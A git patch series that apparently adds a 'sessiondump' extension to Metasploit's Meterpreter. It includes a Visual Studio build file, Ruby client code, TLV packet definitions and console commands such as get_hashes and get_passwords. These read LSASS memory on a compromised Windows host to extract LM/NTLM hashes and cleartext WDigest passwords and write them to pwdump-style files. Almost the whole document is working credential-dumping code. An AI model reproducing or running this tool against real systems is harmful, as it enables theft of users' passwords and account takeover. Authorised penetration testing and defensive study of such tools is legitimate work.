+    <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">true</LinkIncremental>
+    <OutDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">.\Release\</OutDir>
+    <IntDir Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">.\Release\</IntDir>
+    <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</LinkIncremental>
+    <GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</GenerateManifest>
+    <OutDir Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
+    <IntDir Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">$(Platform)\$(Configuration)\</IntDir>
+    <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">true</LinkIncremental>
+    <OutDir Condition="'$(Configuration)|$(Platform)'=='Release|x64'">$(Platform)\$(Configuration)\</OutDir>
+    <IntDir Condition="'$(Configuration)|$(Platform)'=='Release|x64'">$(Platform)\$(Configuration)\</IntDir>
+    <LinkIncremental Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</LinkIncremental>
+    <GenerateManifest Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</GenerateManifest>
+    <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
+    <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" />
+    <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" />
+    <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
+    <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" />
+    <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" />
+    <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">AllRules.ruleset</CodeAnalysisRuleSet>
+    <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" />
+    <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" />
+    <CodeAnalysisRuleSet Condition="'$(Configuration)|$(Platform)'=='Release|x64'">AllRules.ruleset</CodeAnalysisRuleSet>
+    <CodeAnalysisRules Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
+    <CodeAnalysisRuleAssemblies Condition="'$(Configuration)|$(Platform)'=='Release|x64'" />
+  </PropertyGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SESSIONDUMP_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>EditAndContinue</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <AdditionalOptions>netapi32.lib mpr.lib %(AdditionalOptions)</AdditionalOptions>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX86</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <AdditionalIncludeDirectories>..\..\source\extensions\sessiondump;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SESSIONDUMP_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <AssemblerListingLocation>.\Release/</AssemblerListingLocation>
+      <ObjectFileName>.\Release/</ObjectFileName>
+      <ProgramDataBaseFileName>.\Release/</ProgramDataBaseFileName>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>Netapi32.lib;Mpr.lib;metsrv.lib;version.lib;bcrypt.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <OutputFile>.\Release/ext_server_sessiondump.dll</OutputFile>
+      <AdditionalLibraryDirectories>..\metsrv\Release;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <DelayLoadDLLs>metsrv.dll;%(DelayLoadDLLs)</DelayLoadDLLs>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>.\Release/ext_server_sessiondump.map</MapFileName>
+      <SubSystem>NotSet</SubSystem>
+      <OptimizeReferences>
+      </OptimizeReferences>
+      <EnableCOMDATFolding>
+      </EnableCOMDATFolding>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>
+      </DataExecutionPrevention>
+      <ImportLibrary>.\Release/ext_server_sessiondump.lib</ImportLibrary>
+      <TargetMachine>MachineX86</TargetMachine>
+      <Profile>false</Profile>
+    </Link>
+    <PostBuildEvent>
+      <Command>copy /y "$(ProjectDir)\release\ext_server_sessiondump.dll" "$(ProjectDir)..\..\output\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
+    <Midl>
+      <TargetEnvironment>X64</TargetEnvironment>
+    </Midl>
+    <ClCompile>
+      <Optimization>Disabled</Optimization>
+      <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SESSIONDUMP_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <MinimalRebuild>true</MinimalRebuild>
+      <BasicRuntimeChecks>EnableFastChecks</BasicRuntimeChecks>
+      <RuntimeLibrary>MultiThreadedDLL</RuntimeLibrary>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <AdditionalOptions>netapi32.lib mpr.lib %(AdditionalOptions)</AdditionalOptions>
+      <GenerateDebugInformation>true</GenerateDebugInformation>
+      <SubSystem>Windows</SubSystem>
+      <TargetMachine>MachineX64</TargetMachine>
+    </Link>
+  </ItemDefinitionGroup>
+  <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
+    <Midl>
+      <TargetEnvironment>X64</TargetEnvironment>
+    </Midl>
+    <ClCompile>
+      <Optimization>MaxSpeed</Optimization>
+      <InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
+      <IntrinsicFunctions>false</IntrinsicFunctions>
+      <AdditionalIncludeDirectories>..\..\source\extensions\sessiondump;..\..\source\openssl\include;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
+      <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_SESSIONDUMP_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
+      <StringPooling>true</StringPooling>
+      <RuntimeLibrary>MultiThreaded</RuntimeLibrary>
+      <FunctionLevelLinking>true</FunctionLevelLinking>
+      <PrecompiledHeader>
+      </PrecompiledHeader>
+      <AssemblerListingLocation>.\Release/</AssemblerListingLocation>
+      <ObjectFileName>.\Release/</ObjectFileName>
+      <ProgramDataBaseFileName>.\Release/</ProgramDataBaseFileName>
+      <WarningLevel>Level3</WarningLevel>
+      <DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
+    </ClCompile>
+    <Link>
+      <AdditionalDependencies>Netapi32.lib;Mpr.lib;metsrv.lib;version.lib;bcrypt.lib;%(AdditionalDependencies)</AdditionalDependencies>
+      <OutputFile>.\Release\ext_server_sessiondump.x64.dll</OutputFile>
+      <AdditionalLibraryDirectories>..\metsrv\Release;..\..\source\openssl\lib\win;%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
+      <DelayLoadDLLs>metsrv.dll;%(DelayLoadDLLs)</DelayLoadDLLs>
+      <GenerateDebugInformation>false</GenerateDebugInformation>
+      <GenerateMapFile>true</GenerateMapFile>
+      <MapFileName>.\Release/ext_server_sessiondump.map</MapFileName>
+      <SubSystem>NotSet</SubSystem>
+      <OptimizeReferences>
+      </OptimizeReferences>
+      <EnableCOMDATFolding>
+      </EnableCOMDATFolding>
+      <RandomizedBaseAddress>false</RandomizedBaseAddress>
+      <DataExecutionPrevention>
+      </DataExecutionPrevention>
+      <ImportLibrary>.\Release/ext_server_sessiondump.lib</ImportLibrary>
+      <TargetMachine>MachineX64</TargetMachine>
+      <Profile>false</Profile>
+    </Link>
+    <PostBuildEvent>
+      <Command>copy /y "$(ProjectDir)\release\ext_server_sessiondump.x64.dll" "$(ProjectDir)..\..\output\"</Command>
+    </PostBuildEvent>
+  </ItemDefinitionGroup>
+  <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
+  <ImportGroup Label="ExtensionTargets">
+  </ImportGroup>
+</Project>
\ No newline at end of file
diff --git a/lib/rex/post/meterpreter/extensions/sessiondump/sessiondump.rb b/lib/rex/post/meterpreter/extensions/sessiondump/sessiondump.rb
new file mode 100755
index 000000000000..98864c0c375c
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/sessiondump/sessiondump.rb
@@ -0,0 +1,176 @@
+#!/usr/bin/env ruby
+
+require 'rex/post/meterpreter/extensions/sessiondump/tlv'
+
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module SessionDump
+
+###
+#
+# This meterpreter extension can be used to dump hashes and passwords from memory
+# Compatible with x86 and x64 systems from Windows XP/2003 to Windows 8/2012
+# Author : Steeve Barbeau (steeve DOT barbeau AT hsc DOT fr)
+# http://www.hsc.fr/ressources/outils/sessiondump/index.html.en
+#
+###
+class SessionDump < Extension
+
+	def initialize(client)
+		super(client, 'sessiondump')
+
+		client.register_extension_aliases(
+			[
+				{
+					'name' => 'sessiondump',
+					'ext'  => self
+				},
+			])
+	end
+
+	def read_csv_file(file_path, dll_name)
+		# Read CSV file containing offsets for lsasrv.dll or wdigest.dll
+		f = open(file_path, 'r')
+		f_content = f.readlines()
+		f.close()
+
+		csv_parsed = {}
+		f_content.each do |l|
+			line_parsed = l.split(',')
+
+			if dll_name == 'lsasrv.dll'
+				csv_parsed["#{line_parsed[0]}.#{line_parsed[1]}"] = {
+								'encryptmemory' => line_parsed[2],
+								'logon_session_list_addr' => line_parsed[3],
+								'logon_session_list_count' => line_parsed[4],
+								'feedback_addr' => line_parsed[5],
+								'deskey_ptr_addr' => line_parsed[6],
+								'threedeskey_ptr_addr' => line_parsed[7],
+								'iv_addr' => line_parsed[8].chomp.chomp}
+			elsif dll_name == 'wdigest.dll'
+				csv_parsed["#{line_parsed[0]}.#{line_parsed[1]}"] = {
+								'wdigest_session_list' => line_parsed[2].chomp.chomp}
+			end
+		end
+		return csv_parsed
+	end
+
+	def read_csv_input(dll_name, csv_data)
+		# Read offsets passed to get_hashes and get_password via -i option
+		input_parsed = csv_data.split(',', 8)
+
+		csv_parsed = {}
+		if dll_name == 'lsasrv.dll'
+			if input_parsed.size() < 7
+				return nil
+			end
+			csv_parsed['encryptmemory'] = input_parsed[0].to_i
+			csv_parsed['logon_session_list_addr'] = input_parsed[1].to_i
+			csv_parsed['logon_session_list_count'] = input_parsed[2].to_i
+			csv_parsed['feedback_addr'] = input_parsed[3].to_i
+			csv_parsed['deskey_ptr_addr'] = input_parsed[4].to_i
+			csv_parsed['threedeskey_ptr_addr'] = input_parsed[5].to_i
+			csv_parsed['iv_addr'] = input_parsed[6].to_i
+		end
+		if dll_name == 'wdigest.dll'
+			if input_parsed.size() != 8
+				return nil
+			end
+			csv_parsed['wdigest_session_list'] = input_parsed[7].to_i
+		end
+		return csv_parsed
+	end
+
+	def get_dll_version(dll_name)
+		# Get version of lsasrv.dll or wdigest.dll
+		req = Packet.create_request('getDllVer')
+		req.add_tlv(TLV_TYPE_VERSION_DLL_REQUEST, dll_name)
+		res = client.send_request(req)
+		dll_version = res.get_tlv_value(TLV_TYPE_VERSION_DLL_ANSWER)
+		if dll_version == "error"
+			return nil
+		else
+			return dll_version
+		end
+	end
+
+	def get_symbols_addresses(path_file, dll_version, dll_name)
+		# Parse CSV file in order to get offsets relating to DLL versions of
+		# the compromise computer
+		csv_content = client.sessiondump.read_csv_file(path_file, dll_name)
+		arch = client.sys.config.sysinfo['Architecture']
+		csv_key = "#{dll_version}.#{arch}"
+
+		if csv_content.key?(csv_key)
+			symb_addr = csv_content[csv_key]
+			return symb_addr
+		else
+			return nil
+		end
+	end
+
+	def get_hashes(symbols_addr)
+		# Extract hashes from Windows memory
+		req = Packet.create_request('getHashes')
+		symbols_addr.each_pair do |k,v|
+			req.add_tlv(TLV_TYPE_SYMBOLS_NAME, k)
+			req.add_tlv(TLV_TYPE_SYMBOLS_ADDR, v)
+		end
+		res = client.send_request(req)
+
+		sessions = []
+		session = {}
+
+		res.each do |t|
+			if t.type == TLV_TYPE_ERROR
+				session['error'] = t.value
+				sessions.push(session)
+			elsif t.type == TLV_TYPE_DOMAIN
+				session['domain'] = t.value
+			elsif t.type == TLV_TYPE_USER
+				session['user'] = t.value
+			elsif t.type == TLV_TYPE_LM
+				session['lm'] = t.value
+			elsif t.type == TLV_TYPE_NTLM
+				session['ntlm'] = t.value
+				sessions.push(session)
+				session = {}
+			end
+		end
+		return sessions.uniq
+	end
+
+	def get_wdigest_passwords(symbols_addr)
+		# Extract passwords from Windows memory
+		req = Packet.create_request('getWdigestPasswords')
+		symbols_addr.each_pair do |k,v|
+			req.add_tlv(TLV_TYPE_SYMBOLS_NAME, k)
+			req.add_tlv(TLV_TYPE_SYMBOLS_ADDR, v)
+		end
+		res = client.send_request(req)
+
+		sessions = []
+		session = {}
+
+		res.each do |t|
+			if t.type == TLV_TYPE_ERROR
+				session['error'] = t.value
+				sessions.push(session)
+			elsif t.type == TLV_TYPE_DOMAIN
+				session['domain'] = t.value
+			elsif t.type == TLV_TYPE_USER
+				session['user'] = t.value
+			elsif t.type == TLV_TYPE_PWD
+				session['pwd'] = t.value
+				sessions.push(session)
+				session = {}
+			end
+		end
+		return sessions.uniq
+	end
+
+end
+
+end; end; end; end; end
diff --git a/lib/rex/post/meterpreter/extensions/sessiondump/tlv.rb b/lib/rex/post/meterpreter/extensions/sessiondump/tlv.rb
new file mode 100755
index 000000000000..996c79bc72da
--- /dev/null
+++ b/lib/rex/post/meterpreter/extensions/sessiondump/tlv.rb
@@ -0,0 +1,37 @@
+module Rex
+module Post
+module Meterpreter
+module Extensions
+module SessionDump
+
+###
+#
+# This meterpreter extension can be used to dump hashes and passwords from memory
+# Compatible with x86 and x64 systems from Windows XP/2003 to Windows 8/2012
+# Author : Steeve Barbeau (steeve DOT barbeau AT hsc DOT fr)
+# http://www.hsc.fr/ressources/outils/sessiondump/index.html.en
+#
+###
+
+# Structure of packets used by the extension
+
+TLV_TYPE_ERROR               = TLV_META_TYPE_UINT   | (TLV_EXTENSIONS + 1)
+# DLL version
+TLV_TYPE_VERSION_DLL_REQUEST = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 2)
+TLV_TYPE_VERSION_DLL_ANSWER  = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 3)
+
+# Symbols addresses
+TLV_TYPE_SYMBOLS_NAME        = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4)
+TLV_TYPE_SYMBOLS_ADDR        = TLV_META_TYPE_RAW    | (TLV_EXTENSIONS + 5)
+
+# Credentials
+TLV_TYPE_DOMAIN              = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 6)
+TLV_TYPE_USER                = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 7)
+TLV_TYPE_PWD                 = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 8)
+TLV_TYPE_LM                  = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 9)
+TLV_TYPE_NTLM                = TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 10)
+end
+end
+end
+end
+end
diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sessiondump.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sessiondump.rb
new file mode 100755
index 000000000000..d21e85a36dc0
--- /dev/null
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sessiondump.rb
@@ -0,0 +1,304 @@
+require 'rex/post/meterpreter'
+
+module Rex
+module Post
+module Meterpreter
+module Ui
+
+###
+#
+# This meterpreter extension can be used to dump hashes and passwords from memory
+# Compatible with x86 and x64 systems from Windows XP/2003 to Windows 8/2012
+# Author : Steeve Barbeau (steeve DOT barbeau AT hsc DOT fr)
+# http://www.hsc.fr/ressources/outils/sessiondump/index.html.en
+#
+###
+
+ERROR_SESSIONDUMP_PROCESS = 1
+ERROR_SESSIONDUMP_GET_DATA_IN_MEMORY = 2
+ERROR_SESSIONDUMP_GET_HASHES = 3
+ERROR_SESSIONDUMP_GET_WDIGEST_PASSWORDS = 4
+
+
+class Console::CommandDispatcher::SessionDump
+
+	Klass = Console::CommandDispatcher::SessionDump
+
+	include Console::CommandDispatcher
+
+	#
+	# Initializes an instance of the SessionDump command interaction.
+	#
+	def initialize(shell)
+		super
+
+		@lsasrv = Hash.new
+		@lsasrv['version'] = nil
+		@lsasrv['offsets'] = nil
+		@lsasrv['file'] = "sessiondump_lsasrv_offsets.csv"
+
+		@wdigest = Hash.new
+		@wdigest['version'] = nil
+		@wdigest['offsets'] = nil
+		@wdigest['file'] = "sessiondump_wdigest_offsets.csv"
+
+		@dlls = Hash.new
+		@dlls['lsasrv.dll'] = @lsasrv
+		@dlls['wdigest.dll'] = @wdigest
+
+		@errors = {ERROR_SESSIONDUMP_PROCESS => "Fail to open Lsass process. Check your rights !",
+					ERROR_SESSIONDUMP_GET_DATA_IN_MEMORY => "Fail to get information in memory. It can be a problem of offsets",
+					ERROR_SESSIONDUMP_GET_HASHES => "Fail to get hashes",
+					ERROR_SESSIONDUMP_GET_WDIGEST_PASSWORDS => "Fail to get Wdigest passwords"}
+	end
+
+	#
+	# List of supported commands.
+	#
+	def commands
+		{
+			"set_lsasrv_offsets_file" => "Specify which file to use to look for Lsasrv offsets (by default use $MSF/msf3/data/sessiondump_lsasrv_offsets.csv)",
+			"set_wdigest_offsets_file" => "Specify which file to use to look for Wdigest offsets (by default use $MSF/msf3/data/sessiondump_wdigest_offsets.csv)",
+			"get_hashes" => "Dump LM hash and NTLM hash. `get_hashes output_file` will copy hashes in a file",
+			"get_passwords" => "Dump clear text passwords from Wdigest.dll",
+			"get_lsasrv_version" => "Get Lsasrv DLL version",
+			"get_wdigest_version" => "Get Wdigest DLL version",
+		}
+	end
+
+	@@get_hashes_opts = Rex::Parser::Arguments.new(
+		'-i' => [true, "Specify offsets to use. Format : encryptmemory,list_addr,list_count,feedback,deskey,3deskey,iv"],
+		'-o' => [true, "Write output in .pwdump, .lm, .ntlm files. Default name: `sessiondump.{pwdump,lm,ntlm}`"]
+	)
+
+	@@get_passwords_opts = Rex::Parser::Arguments.new(
+		'-i' => [true, "Specify offsets to use. Format : encryptmemory,list_addr,list_count,feedback,deskey,3deskey,iv,wdigest_list"],
+		'-o' => [true, "Write output in a .pwd file. Default name: `sessiondump.pwd`"]
+	)
+
+	def cmd_set_lsasrv_offsets_file(*args)
+		if args.empty?
+			print_error "Argument is mandatory"
+			return false
+		elsif not ::File.file?(args[0])
+			print_error "#{args[0]} is not a regular file"
+			return false
+		end
+
+		set_dll_offsets('lsasrv.dll', args[0])
+		if not @dlls['lsasrv.dll']['offsets'].nil?
+			print_status "Symbols addresses are loaded"
+			return true
+		end
+	end
+
+	def cmd_set_lsasrv_offsets_file_tabs(str, words)
+		tab_complete_filenames(str, words)
+	end
+
+	def cmd_set_wdigest_offsets_file(*args)
+		if args.empty?
+			print_error "Argument is mandatory"
+			return false
+		elsif not ::File.file?(args[0])
+			print_error "#{args[0]} is not a regular file"
+			return false
+		end
+
+		set_dll_offsets('wdigest.dll', args[0])
+		if not @dlls['wdigest.dll']['offsets'].nil?
+			print_status "Symbols addresses are loaded"
+			return true
+		end
+	end
+
+	def cmd_set_wdigest_offsets_file_tabs(str, words)
+		tab_complete_filenames(str, words)
+	end
+
+	def cmd_get_passwords_help
+		print_line "Usage: get_passwords [options]"
+		print_line
+		print_line "Extract passwords from memory"
+		print_line @@get_passwords_opts.usage
+	end
+
+	def cmd_get_passwords(*args)
+		pwd_file = nil
+		inline_offsets = false
+
+		@@get_passwords_opts.parse(args) { |opt, idx, val|
+			case opt
+			when "-o"
+				# Export password in file
+				if val.nil?
+					val = 'sessiondump'
+				end
+				pwd_file = ::File.new("#{val}.pwd", 'a+')
+			when "-i"
+				if not val.nil?
+					load_inline_offsets('lsasrv.dll', val)
+					load_inline_offsets('wdigest.dll', val)
+					inline_offsets = true
+				end
+			end
+		}
+
+		if (@dlls['wdigest.dll']['offsets'].nil? or @dlls['lsasrv.dll']['offsets'].nil?) and not inline_offsets
+			# Init DLL offsets thanks to CSV files
+			init_offset
+		end
+
+		if not @dlls['wdigest.dll']['offsets'].nil? and not @dlls['lsasrv.dll']['offsets'].nil?
+			all_offsets = @dlls['wdigest.dll']['offsets'].merge(@dlls['lsasrv.dll']['offsets'])
+
+			sessions = client.sessiondump.get_wdigest_passwords(all_offsets)
+			if not pwd_file.nil?
+				print_status "Exporting to file ..."
+			end
+			sessions.each do |s|
+				if s.key?('error')
+					print_error "#{@errors[s['error']]}"
+				else
+					output = "#{s['domain']}\\#{s['user']} : #{s['pwd']}"
+					print_line output
+					if not pwd_file.nil?
+						pwd_file.write("#{output}\n")
+					end
+				end
+			end
+			if not pwd_file.nil?
+				pwd_file.close()
+			end
+			return true
+		end
+		return false
+	end
+
+	def cmd_get_hashes_help
+		print_line "Usage: get_hashes [options]"
+		print_line
+		print_line "Extract LM and NTLM hashes from memory"
+		print_line @@get_hashes_opts.usage
+	end
+
+	def cmd_get_hashes(*args)
+		pwdump_file, lm_file, ntlm_file = nil
+		inline_offsets = false
+
+		@@get_hashes_opts.parse(args) { |opt, idx, val|
+			case opt
+			when "-o"
+				# Export hashes in file
+				if val.nil?
+					val = 'sessiondump'
+				end
+				pwdump_file = ::File.new("#{val}.pwdump", 'a+')
+				lm_file = ::File.new("#{val}.lm", 'a+')
+				ntlm_file = ::File.new("#{val}.ntlm", 'a+')
+			when "-i"
+				if not val.nil?
+					load_inline_offsets('lsasrv.dll', val)
+					inline_offsets = true
+				end
+			end
+		}
+
+		if @dlls['lsasrv.dll']['offsets'].nil? and not inline_offsets
+			# Init DLL offsets thanks to CSV files
+			init_offset
+		end
+
+		if not @dlls['lsasrv.dll']['offsets'].nil?
+			sessions = client.sessiondump.get_hashes(@dlls['lsasrv.dll']['offsets'])
+			if not pwdump_file.nil? and not lm_file.nil? and not ntlm_file.nil?
+				print_status "Exporting to file ..."
+			end
+			sessions.each do |s|
+				if s.key?('error')
+					print_error "#{@errors[s['error']]}"
+				else
+					output = "#{s['domain']}\\#{s['user']}::#{s['lm']}:#{s['ntlm']}:::"
+					print_line output
+					if not pwdump_file.nil? and not lm_file.nil? and not ntlm_file.nil?
+						pwdump_file.write("#{output}\n")
+						lm_file.write("#{s['lm']}\n")
+						ntlm_file.write("#{s['ntlm']}\n")
+					end
+				end
+			end
+			if not pwdump_file.nil? and not lm_file.nil? and not ntlm_file.nil?
+				pwdump_file.close()
+				lm_file.close()
+				ntlm_file.close()
+			end
+			return true
+		end
+		return false
+	end
+
+	def cmd_get_lsasrv_version()
+		print_line client.sessiondump.get_dll_version('lsasrv.dll')
+		return true
+	end
+
+	def cmd_get_wdigest_version()
+		print_line client.sessiondump.get_dll_version('wdigest.dll')
+		return true
+	end
+
+	#
+	# Name for this dispatcher
+	#
+	def name
+		"SessionDump"
+	end
+
+	protected
+
+	def set_dll_offsets(dll_name, offset_file)
+		# Get DLL version
+		@dlls[dll_name]['version'] = client.sessiondump.get_dll_version(dll_name)
+
+		# Get symbols addresses relating to DLL version
+		@dlls[dll_name]['offsets'] = client.sessiondump.get_symbols_addresses(offset_file, @dlls[dll_name]['version'], dll_name)
+
+		if @dlls[dll_name]['offsets'].nil?
+			print_error "#{dll_name} version #{@dlls[dll_name]['version']} (#{client.sys.config.sysinfo['Architecture']}) is not in your CSV file"
+			return false
+		end
+	end
+
+	def load_inline_offsets(dll_name, inline_data)
+		#@dlls[dll_name]['offsets'] = client.sessiondump.read_csv_input(dll_name, inline_data)
+		tmp = client.sessiondump.read_csv_input(dll_name, inline_data)
+		if not tmp.nil?
+			@dlls[dll_name]['offsets'] = tmp
+		else
+			print_error "Failed to import input offsets. Check input parameters!"
+		end
+	end
+
+	def init_offset
+		wdigest_offsets_file = ::File.join(Msf::Config.data_directory, @dlls['wdigest.dll']['file'])
+		lsasrv_offsets_file = ::File.join(Msf::Config.data_directory, @dlls['lsasrv.dll']['file'])
+
+		dlls_offsets = Hash.new
+		dlls_offsets['lsasrv.dll'] = lsasrv_offsets_file
+		dlls_offsets['wdigest.dll'] = wdigest_offsets_file
+
+		dlls_offsets.each do |k,v|
+			if ::File.file?(v)
+				set_dll_offsets(k, v)
+			else
+				print_error "Symbols offsets file (#{v}) not found. Please run the appropriate `set_[lsasrv|wdigest]_offsets_file` command before."
+			end
+		end
+	end
+
+end
+
+end
+end
+end
+end

From a707a6416cfdf9bc4b9be236fa27e4f811ae8ce1 Mon Sep 17 00:00:00 2001
From: Steeve Barbeau <steeve.barbeau@hsc.fr>
Date: Mon, 22 Apr 2013 14:16:01 +0200
Subject: [PATCH 2/2] Sessiondump extension to dump password/hashs

This meterpreter extension can be used to dump hashes and passwords
from memory
Compatible with x86 and x64 systems from Windows XP/2003 to
Windows 8/2012
Author : Steeve Barbeau (steeve DOT barbeau AT hsc DOT fr)
http://www.hsc.fr/ressources/outils/sessiondump/index.html.en
---
 .../ui/console/command_dispatcher/sessiondump.rb            | 6 +++++-
 1 file changed, 5 insertions(+), 1 deletion(-)

diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sessiondump.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sessiondump.rb
index d21e85a36dc0..b81250a98ec2 100755
--- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/sessiondump.rb
+++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/sessiondump.rb
@@ -160,7 +160,11 @@ def cmd_get_passwords(*args)
 				if s.key?('error')
 					print_error "#{@errors[s['error']]}"
 				else
-					output = "#{s['domain']}\\#{s['user']} : #{s['pwd']}"
+					if s['pwd'].size() == 0
+						output = "#{s['domain']}\\#{s['user']} : <PASSWORD_EMPTY>"
+					else
+						output = "#{s['domain']}\\#{s['user']} : #{s['pwd']}"
+					end
 					print_line output
 					if not pwd_file.nil?
 						pwd_file.write("#{output}\n")